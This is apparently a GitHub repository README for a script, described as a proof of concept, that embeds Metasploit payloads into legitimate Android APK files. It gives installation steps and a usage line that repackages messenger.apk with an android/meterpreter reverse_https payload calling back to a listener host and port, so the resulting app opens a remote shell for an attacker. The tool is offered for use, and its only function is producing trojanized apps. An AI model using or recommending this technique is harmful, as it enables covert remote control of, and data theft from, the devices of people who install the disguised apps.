0-ali / metasploit-apk-embed-payload

Embed a Metasploit Payload in an Original .Apk File
114 stars 55 forks source link

Use it on your own risk Donate

Embed a Metasploit Payload in an Original .Apk File

I choose a lazy person to do a hard job. Because a lazy person will find an easy way to do it.

Bill Gates

This script is a POC for injecting metasploit payloads on arbitrary APKs

Authored by timwr, Jack64 , developed by xC0d3rZ

Installation

 gem install bundler
 bundler install

Requirements

  1. Ruby (>= 1.8.7).
  2. apktool.jar (>= 2.x).

Usage

./run [target.apk] [msfvenom options]


e.g

./run messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443

Download